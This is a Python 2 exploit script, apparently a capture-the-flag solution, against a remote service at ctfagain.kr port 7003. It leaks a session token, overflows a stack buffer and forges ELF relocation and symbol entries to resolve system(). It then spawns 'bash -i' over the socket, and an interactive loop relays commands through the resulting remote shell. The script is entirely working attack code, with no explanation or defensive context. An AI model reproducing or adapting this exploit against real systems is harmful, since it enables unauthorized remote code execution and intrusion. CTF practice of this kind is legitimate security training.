from socket import *
import struct
import time
import sys
buffer = 0x804B028 # bss
target = 0x804B00C #memcpy
dynstr = 0x80483EC
lr = 0x8048B9A
p = lambda x: struct.pack("<L", x)
ph = lambda x: struct.pack("<I", x)
pb = lambda x: struct.pack("<B", x)
log = lambda x: sys.stderr.write(x+'\n')
rel = p(target)
rel += p((((buffer - 0x80481CC + 18+16)/16)<<8) + 7) # 16 multiplier
s = socket(AF_INET, SOCK_STREAM)
payload = ""
payload += rel
payload += "A"*(20-len(payload)) # dummy
payload += p(buffer - dynstr + 38)
payload += p(0xff) # writable int, isn't it?
payload += p(0xff) # symbol size (st_size)
payload += pb(0xf0) # symbol info (st_info)
payload += pb(0xc0) # symbol other - must be 0
payload += ph(0xffff) # symbol index
payload += "system\x00"
payload += p(0xC0DECAFE) # len(payload) - overwritten
payload += p(buffer)
payload += "A" * 1000
ebp_path = buffer + len(payload)
payload += p(0xC0DECAFE) # ebp
payload += p(0x80488EB)
payload += p(buffer - 0x8048624) # index here
payload += p(0xC0DECAFE) # ret
payload += p(buffer + len(payload) + 8)
payload += p(buffer)
payload += "bash -i <&4 >&4 2>&4"
s.connect(('ctfagain.kr', 7003))
print s.recv(1024)
s.send("target")
print s.recv(1024)
s.send("%d/%d" %(0x1010101,0x1010101))
print s.recv(1024)
print s.recv(1024)
s.send("a"*0x200) # for memory leak
token=s.recv(1024)[0x200+30:]
print "============== exploit: token get"
print token
s.send("launch")
print s.recv(1024)
s.send(token[:-1]) # without newline
time.sleep(0.01)
print s.recv(1024)
print s.recv(1024)
stage0 = ""
stage0 += "A" * 524
stage0 += p(ebp_path)
stage0 += p(0x80488E0)
stage0 += p(lr)
stage0 += p(4)
stage0 += p(buffer)
stage0 += p(len(payload))
stage0 += p(0)
s.send(stage0)
s.send(payload)
print s.recv(1024)
time.sleep(0.01)
#s.close()
while True:
r = raw_input()
s.send(r+'\n')
sys.stdout.write(s.recv(102400))